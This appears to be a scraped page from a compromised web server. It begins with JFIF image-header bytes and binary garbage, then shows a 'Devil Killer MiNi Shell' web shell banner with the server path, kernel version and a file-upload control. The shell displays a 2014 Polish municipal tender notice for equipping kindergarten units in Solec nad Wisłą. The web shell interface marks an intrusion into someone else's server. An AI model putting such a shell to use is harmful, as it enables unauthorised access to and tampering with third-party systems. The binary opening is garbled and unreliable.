JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140422/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140422/135764-N-2014.html

<p class="kh_header"><b>Solec nad Wisłą: Modernizacja oddziałów przedszkolnych w Gminie Solec nad Wisłą.</b><br>
<b>Numer ogłoszenia: 135764 - 2014; data zamieszczenia: 22.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Solcu nad Wisłą , ul. Rynek 1, 27-320 Solec nad Wisłą, woj. mazowieckie, tel. 048 3761266, 3761257, faks 048 3761266.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.solec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oddziałów przedszkolnych w Gminie Solec nad Wisłą..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: Modernizacja oddziałów przedszkolnych w Gminie Solec nad Wisłą. Zamówienie podzielone jest na 7 części:

cz. I   Organizacja placu zabaw
CPV: 37535200-9 Wyposażenie placów zabaw

Huśtawka ważka szt. 1
Karuzela z kierownicą szt. 2
Piramida szt. 1
Zjeżdżalnia szt. 1
Bujak Motorek szt. 1

cz. II   Dostosowanie pomieszczeń - toalety
CPV: 44410000-1 Artykuły łazienkowe i kuchenne

Umywalka biała szt. 3
Lustro szt. 1
Dozownik mydła w płynie 0,5 l szt. 6
Dozownik na ręczniki papierowe w listkach szt. 3
Miska ustępowa ze spłuczką szt. 3 
Brodzik szt. 1
Nakładka sedesowa typu Hipcio szt. 3
Zestaw  sanitarny ( umywalka, bateria, syfon) szt. 2
Podgrzewacz wody szt. 2
Zestaw WC (wc kopakt, deska sedesowa) szt. 1


cz. III   Sprzęt kuchenny i do utrzymania czystości
CPV: 39221000-7 Sprzęt kuchenny
CPV: 39700000-9 Sprzęt gospodarstwa domowego

Odkurzacz szt. 2
Pralka  szt. 2
Lodówka z zamrażarką szt. 1
Zestaw garnków z pokrywą szt. 2
Zestaw naczyń dla dzieci szt. 4
Zestaw przyborów kuchennych szt.2
Sztuce dla dzieci szt. 2
Patelnia aluminiowa teflon szt. 1
Pojemnik termoizolacyjny poj. 38 l szt. 1
Miska polerowana 5,5 l szt. 1
Wiadro 10 l szt. 1
Zestaw noży kutych szt. 1
Termos stalowy z przyciskiem 1,5 l szt. 3
Wózek kelnerski 3- pólkowy ze stali nierdz. Szt. 1
Elektr. wyparzacz do naczyń szt. 1
Stół przyścienny z półką szt. 1
Krajalnica do wędlin szt. 1
Zestaw naczeń dla dzieci szt. 24
Sztuce dla dzieci szt. 24


cz. IV  Wyposażenie sal dydaktycznych i szatni
CPV: 39161000-8  Meble przedszkolne
CPV: 39500000-7  Wyroby włókiennicze
Zestaw mebli szt. 1
Szafka na prace szt. 2
Szafka z przesuwanymi drzwiami szt. 2
Szafka wysoka z drzwiczkami  szt. 2
Pufa do biblioteczki szt. 1
Dywan 2x3 m szt. 2
Tablica suchościeralna 100x 170 szt. 1
Szafka jeż szt. 1
Labirynt na nogi t. ślimaczek szt. 1
Labirynt na nogi t. wąż szt. 1
Stół prostokątny 0-3 szt. 4
Krzesło w rozmiarze  2 szt. 6
Krzesło w rozmiarze  nr 1 szt. 18
Zestaw mebli szt. 1
Regał  z 3 półkami klon szt. 1
Szafka z drzwiami do mocowania plakatów - klon szt.1
Plakat do szafek - Kształty szt. 1
Plakat do szafek - Kolory szt. 1
Biurko z szafką i szufladą - klon szt. 1
Krzesło konferencyjne szt. 1
Biblioteczka z ławeczką szt. 1
Dywan 3x4 szt. 1
Tablica biała magnet. Duża szt. 1
Tablica biała magnet. Duża szt. 1
Tablica wisząca szt. 1
Suszarka metalowa szt. 1 
Przesuwanka - Drzewo duże szt. 1
Naklejki na ścianie sowy na drzewie szt.1
Wózek na prace plastyczne- klon szt. 1
Pojemniki płytkie - żółty szt. 5
Zestaw dekoracji szt. 1
Zakup i montaż rolet okiennych szt. 1
Pufa t. piesek szt. 2
Pufa t. tygrys szt. 1
Pufa t. biedronka szt. 2
Pufa t. baranek szt. 1
Pufa t. żółw szt. 2
Pufa t. kotek szt. 2
Gruszka mała czerwona szt. 2
Gruszka mała fioletowa szt. 2
Poducha sensoryczna myszka szt. 2
Poduch t. myszka szt. 2
Poducha t. rybka szt. 1
Poduszka  kolor mix szt. 4
Poduszki okrągłe ( 10 szt.) szt. 2
Bajkowy materac 3 częściowy. szt. 2
Materac narożny t. serce szt. 1
Kanapka rozkładana szt. 2
Kanapka śpiący miś szt. 1
Ławeczka szatniowa regulow. z wieszakiem - buk szt. 1
Ławeczka szatniowa - buk szt. 1
Wieszak szatniowy - buk szt. 1
Szafa ubraniowa - klon szt. 2
Metalowa szafa gosp. Szt. 2
Regał magazynowy szt. 1
Regał metalowy 170 szt. 1
Szatnia - duża szt. 3
Szatnia - mała szt. 1


cz. V  Zabawki, pomoce dydaktyczne i artykuły plastyczne
CPV: 37520000-9 Zabawki
CPV: 39162100-6 Pomoce dydaktyczne
CPV: 37820000-2 Wyroby artystyczne

Zabawki:	
	Zestaw narzędzi	 10szt.
	Zestaw perkusyjny 	4szt.
	Bujak jamnik	 2szt.
	Szczęśliwy traf żabki 2szt.
	Matematyczny twister 2szt.
	Skakanka 1 szt.	50
	Piłka - 30cm	 10szt.
	Miękka mała lalka 2szt.
	Lalka płacząca 	2szt.
	Lalka mała z nocnikiem 2szt.
	Lalka siusiajaca	 szt.2
	Lala do ćwiczeń i nauki	2 szt.
	Bobas	 2szt.
	Lalka duża	  2szt.
	Lalka z akcesoriami do robienia fryzur  2szt.
	Łóżeczko dla lalek 	2szt.
	Medyczny wózek	 6szt.
	Duża kuchnia	2szt.
	Mały samochód terenowy czerwony 	2szt.
	Pojemnik	 6szt.
	Kasa sklepowa ze skanerem	2szt.
	Piłka do skakania 45 cm	 6szt.
	Piłka do skakania 55 cm	6szt.
	Ringo Sensoryczne	 30szt.
	Koło latające	30szt.
	Tunel typu Stonoga	 2szt.
	Woreczki - kolory	 6szt.
	Miś 	6szt.
	Miś 	4szt.
	Duży zestaw obiadowy	 6szt.
Straż pożarna	 6szt.
Betoniarka	 6szt.
Koparka	 6szt.
Nakładanka 	2szt.
	Puzzle typu Przyjaciele z zoo 	2szt.
	Puzzle typu Przyjaciele z gospodarstwa 	2szt.
	Puzzle typu 4 warstwy pory roku	 2szt.
	Puzzle typu 5 warstw dom	 2szt.
	Domek letniskowy dla lalek	 2szt.
	Mały zestaw do piasku (dla grupy) 2szt.
	Klocki typu wesołe miasteczko	2 szt.
	Klocki typu Leśne miasteczko 	2szt.
	Kolorowe drewniane klocki	 2szt.
	Geometryczne kształty z tworzywa 8szt.
	Wywrotka z podnoszoną skrzynią ładunkową i otwieraną tylną klapą  	6szt.
	Wywrotka	 6szt.
	Wywrotka z akcesoriami 	8 szt.
	Mata miasto	 2szt.
	Śpiąca lalka	 8szt.

Pomoce dydaktyczne:
	Zestaw bajek typu grajek	- 2 szt.
	Zestaw bajek typu grajek	- 2szt.
	Gra typu rybki	 2szt.
	Gra typu Współpraca na krach 	2szt.
	Książka z ćwiczeniami typu Uczmy się słówek 	50szt.
	Skojarzenia - karty do angielskiego	 2szt.
	Mapa Polski dla najmłodszych	2szt.
	Gra memory typu Flagi	3szt.
Gra planszowa nt. Unii Europejskiej	1szt.
	Plansze typu 4 sezonowe drzewa 2szt.
	Gra planszowa nt. Sortowania odpadów	2szt.
	Gra Domino nt. ekologii	10szt.
	Magnetyczne plansze typu Bawmy się liczbami 	11szt.
	Liczydło stojące	 2szt.
	Magnetyczna linijka	2szt.
	Zestaw zdjęć typu Umiejętności	 2szt.
Dwustronne plansze tematyczne- pory roku, kolory, warzywa , owoce, dobre wychowanie, nasze ciało 7 szt.

Art. plastyczne:
Brystol mix A3/ 100 ark	30 szt.
Brystol biały A4/100 ark	 30szt.
Wkład z kolorowego papieru rysunkowego A4/400 ark.	20szt.
bibuła - mix kolorów 15 rolek	4szt.
Nożyczki przedszkolne 10 szt.	 6szt.
Taśma samoprzylepna 18 mm x 30 m	 20szt.
Klej przezroczysty 200 ml	 30szt.
Klej poj. 1l 	30szt.
Papier szary A3. 20 arkuszy	20szt.
Klasyczne markery zmywalne 8szt.	30szt.
Plastelina 12 kol.                    50szt.
Kredki  12 kol w pud.kart. 	  60szt.
Tempery 6 kolorów 6x1000 ml	10szt.
Zestaw pędzli do malowania 24 szt.	20
Tektura falista (10 arkuszy)	30szt.


cz. VI  Wyposażenie zapewniającego bezpieczne warunki opieki nad dziećmi
CPV: 35110000-8 Sprzęt gaśniczy, ratowniczy i bezpieczeństwa
Oznaczenie ewakuacyjne (8szt.)  szt. 2
Apteczka z wyposażeniem metal. na ścianę szt. 2
Zabezpieczenia gniazdek elektr. ( 8 szt.) szt. 2
Zabezpieczenia kątowe mebli ( 4 szt.) szt. 6
Instrukcja udzielania pierwszej pomocy szt. 2
Gaśnica 4 kg szt. 1
Skrzynka na klucze ewakuac. metal. Szt. 1
Szafka medyczna szt. 1
Zakup i montaż zabudowy grzejników szt. 4
Zakup i montaż zabudowy grzejników szt. szt. 3

cz. VII Sprzęt ICT
CPV: 30200000-1 Urządzenia komputerowe
CPV: 30195000-2 Tablice
CPV: 32310000-9 Odbiorniki audycji radiowych
Komputer wraz z oprogramowaniem szt. 2
Monitor LCD 19 cali szt. 1
Monitor LCD 22 cali  szt. 1
Skaner płaski szt. 1
Projektor krótkoogniskowy LCD szt. 2
Ekran projekcyjny 150x150 szt. 2
Notebook 17cali szt. 2
Telewizor 32 cale LCD szt. 2
Odtwarzacz DVD szt. 1
Odtwarzacz DVD szt. 1
Radioodtwarzacz CD szt. 2
Tablica interaktywna 80 szt. 1
Tablica interaktywna dotykowa, ceramiczna, magnetyczna wraz z oprogramowaniem szt. 1
Urządzenie wielofunkcyjne  szt.2

Szczegółowo opis poszczególnych części przedmiotu zamówienia zawarty jest załączniku          Nr 7 do SIWZ. 

Przedmiot zamówienia obejmuje modernizację 2 oddziałów przedszkolnych w Gminie Solec nad Wisłą mieszczących się przy Zespołach Szkół Samorządowych w Solcu nad Wisłą oraz Pawłowicach. Wszystkie koszty wykonania zamówienia ponosi Wykonawca, w tym m.in.: załadunku, dostawy, rozładunku, montażu przedmiotu umowy, ubezpieczenia transportu przedmiotu umowy do czasu odbioru, gwarancji jakości na dostarczony towar. 
Wszystkie przedmioty  muszą być fabrycznie nowe, wolne od wad oraz dopuszczone do stosowania w placówkach oświatowych.
Dostarczone towary (produkty) muszą posiadać aktualne atesty, certyfikaty lub deklaracje zgodności producentów na podstawie pozytywnych badań przeprowadzonych w laboratoriach posiadających akredytacje Polskiego Centrum Akredytacji i spełniać wszystkie wymogi norm określonych obowiązującym prawem. Deklaracja oferenta, że wszystkie oferowane produkty mają atesty, certyfikaty, świadectwa jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2, 37.53.52.00-9, 44.41.00.00-7, 39.22.10.00-7, 39.70.00.00-9, 39.16.10.00-8, 39.50.00.00-7, 39.16.21.00-6, 37.82.00.00-2, 35.11.00.00-8, 30.20.00.00-1, 30.19.50.00-2, 32.31.00.00-9, 37.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunków wymagane jest złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SIWZ), 
ocena:  przez zastosowanie formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunków wymagane jest złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SIWZ), 
ocena:  przez zastosowanie formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunków wymagane jest złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SIWZ), 
ocena:  przez zastosowanie formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunków wymagane jest złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SIWZ), 
ocena:  przez zastosowanie formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunków wymagane jest złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SIWZ), 
ocena:  przez zastosowanie formuły spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Formularz oferty wg załącznika Nr 1 SIWZ  
b) Jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, składa wraz z ofertą pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia -do ewentualnego wykorzystania wzór oświadczenia - załącznik Nr 5 SIWZ.
c) Pełnomocnictwo, określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik.
d) Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia.
e) Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć oddzielnie oświadczenia i dokumenty wskazane w pkt III.4.2)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.solec.pl w zakładce pt. przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Solcu nad Wisłą ul. Rynek 1 27-320 Solec nad Wisłą, pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2014 godzina 08:30, miejsce: Oferty należy składać w siedzibie Zamawiającego - Urząd Gminy Solec nad Wisłą ul. Rynek 1  27 - 320 Solec nad Wisłą,  pokój nr: 3 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1 Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja placu zabaw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem tej części zamówienia jest dostawa i montaż następujących urządzeń:Huśtawka ważka szt. 1
Karuzela z kierownicą szt. 2
Piramida szt. 1
Zjeżdżalnia szt. 1
Bujak Motorek szt. 1
Szczegółowo opis tej części przedmiotu zamówienia zawarty jest załączniku Nr 7 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostosowanie pomieszczeń - toalety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem tej części zamówienia jest dostawa i montaż następujących urządzeń:
Umywalka biała szt. 3
Lustro szt. 1
Dozownik mydła w płynie 0,5 l szt. 6
Dozownik na ręczniki papierowe w listkach szt. 3
Miska ustępowa ze spłuczką szt. 3 
Brodzik szt. 1
Nakładka sedesowa szt. 3
Zestaw  sanitarny (umywalka, bateria, syfon) szt. 2
Podgrzewacz wody szt. 2
Zestaw WC (wc kopakt, deska sedesowa) szt. 1
Szczegółowo opis tej części przedmiotu zamówienia zawarty jest załączniku Nr 7 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.41.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzęt kuchenny i do utrzymania czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem tej części zamówienia jest dostawa i montaż następujących urządzeń: Odkurzacz szt. 2
Pralka  szt. 2
Lodówka z zamrażarką szt. 1
Zestaw garnków z pokrywą szt. 2
Zestaw naczyń dla dzieci szt. 4
Zestaw przyborów kuchennych szt.2
Sztuce dla dzieci szt. 2
Patelnia aluminiowa teflon szt. 1
Pojemnik termoizolacyjny poj. 38 l szt. 1
Miska polerowana 5,5 l szt. 1
Wiadro 10 l szt. 1
Zestaw noży kutych szt. 1
Termos stalowy z przyciskiem 1,5 l szt. 3
Wózek kelnerski 3- pólkowy ze stali nierdz. Szt. 1
Elektr. wyparzacz do naczyń szt. 1
Stół przyścienny z półką szt. 1
Krajalnica do wędlin szt. 1
Zestaw naczeń dla dzieci szt. 24
Sztuce dla dzieci szt. 24
Szczegółowo opis tej części przedmiotu zamówienia zawarty jest załączniku Nr 7 do SIWZ..</p></li>
